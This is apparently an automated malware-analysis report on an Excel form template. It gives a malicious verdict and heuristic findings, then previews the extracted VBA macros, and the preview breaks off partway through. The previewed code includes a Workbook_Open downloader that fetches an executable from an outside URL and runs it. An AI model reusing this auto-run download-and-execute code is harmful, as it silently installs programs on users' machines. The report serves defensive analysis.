MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The Workbook_Open macro in the VBA script executes a Shell command to download and run a second-stage executable from the URL http://www.yesform.com/active/searchMessenger/dw.php?mode=etc. This executable is saved to C:\sMessenger\searchMessenger_upgrade_x.exe. The macro also attempts to create the directory C:\sMessenger if it does not exist. The presence of the Shell() call and the download functionality strongly indicate a downloader or droppper malware.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.yesform.com/active/searchMessenger/dw.php?mode=etc In document text (OLE body)
- http://www.yesform.com/z_n/forms/search.php?q=In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10166 bytes |
SHA-256: 40c06ee803d83c9f072d0c1085c78a1325cf7289ebaf22456eea5e76dfb0c92f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If Dir("C:\sMessenger\searchMessenger.exe") = "" Then
File_DownLoad "http://www.yesform.com/active/searchMessenger/dw.php?mode=etc", "C:\sMessenger" & "\searchMessenger_upgrade_x.exe"
Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
End If
End Sub
Function File_DownLoad(ByVal SLocalFile As String, ByVal DLocalFile As String) As Boolean
Dim oXMLHTTP As Object, DFile As Long, oResp() As Byte, FS As Object
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
Set FS = CreateObject("Scripting.FileSystemObject")
oXMLHTTP.Open "GET", SLocalFile, False
oXMLHTTP.send
Do While oXMLHTTP.ReadyState <> 4
DoEvents
Loop
oResp = oXMLHTTP.responsebody
If FS.FolderExists("C:\sMessenger") = False Then MkDir "C:\sMessenger"
DFile = FreeFile
If Dir(DLocalFile) <> "" Then Kill DLocalFile
Open DLocalFile For Binary As #DFile
Put #DFile, , oResp
Close #DFile
Set oXMLHTTP = Nothing
Set FS = Nothing
End Function
Attribute VB_Name = "Module1"
Public Const Banner As String = "국내최대 문서서식 예스폼 (www.yesform.com)"
Sub Move_Sheet1()
Sheet1.Activate
End Sub
Sub Move_Sheet2()
Sheet2.Activate
End Sub
Sub Move_Sheet4()
Sheet4.Activate
End Sub
Sub Move_Sheet5()
Sheet5.Activate
End Sub
Sub Move_Sheet6()
Sheet6.Activate
End Sub
Sub 시트보호()
Call Sheet_protect
MsgBox "시트보호모드로 전환되었습니다.", vbInformation, Banner
End Sub
Sub 시트해제()
Dim Result As Integer
Result = MsgBox("본 컨텐츠는 시트보호모드에서 정상적으로 사용할 수 있도록 구성되었습니다." & Chr(13) & "보호 해제 후 임의 수정에 따라 발생하는 컨텐츠 오류 및 손상에 대하여 예스폼(Yesform)이 책임지지 않음을 알려드립니다." & Chr(13) & "시트보호모드를 해제하시겠습니까?", vbYesNo, Banner)
If Result = vbYes Then
Call Sheet_unprotect
Else
Exit Sub
End If
End Sub
Sub P_preview()
ActiveSheet.PrintPreview
End Sub
Sub P_out()
ActiveSheet.PrintOut
End Sub
Sub Sheet_protect()
ActiveSheet.Protect Password = 1234, DrawingObjects:=True, Contents:=True, Scenarios:=True _
, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
AllowFormattingRows:=True, AllowInsertingHyperlinks:=True, AllowSorting:= _
True, AllowFiltering:=True
End Sub
Sub Sheet_unprotect()
ActiveSheet.Unprotect Password = 1234
End Sub
Sub RowCol()
If ActiveSheet.CheckBoxes("Check Box 1").Value = 1 Then
ActiveWindow.DisplayHeadings = True
Else
ActiveWindow.DisplayHeadings = False
End If
End Sub
Sub Approval_3()
Dim RngA(6) As Range
Dim Combo As DropDown
Set RngA(1) = ActiveSheet.[b4] '시작
Set RngA(2) = ActiveSheet.[aj5] '끝
Set RngA(3) = ActiveSheet.[ag4] '1칸 시작
Set RngA(4) = ActiveSheet.[ac4] '2간 시작
Set RngA(5) = ActiveSheet.[y4] '3칸 시작
Set RngA(6) = ActiveSheet.[u4] '4칸 시작
Application.ScreenUpdating = False
Application.DisplayAlerts = False '경고문구 무시
Call Sheet_unprotect
Range(RngA(1), RngA(2)).MergeCells = False
With Range(RngA(6), RngA(2))
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlCenter
.Font.Bold = True
.Font.Size = 9
.Font.Name = "굴림체"
End With
Set Combo = ActiveSheet.DropDowns(1)
Application.ScreenUpdating = False
Select Case Combo.ListIndex
Case 1 '결재란 없음
Range(RngA(1), RngA(2)).MergeCells = True
Case 2 '결재란 한개
Range(RngA(1), RngA(3).Offset(1, -1)).MergeCells = True '앞에 병합(결재란 앞)
Range(RngA(3), RngA(3).Offset(0, 3)).MergeCells = True '첫번째 결재란 위 병합
Range(RngA(3).Offset(1), RngA(2)).MergeCells = True '첫번째 결재란 아래 병합
Case 3 '결재란 두개
Range(RngA(1)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.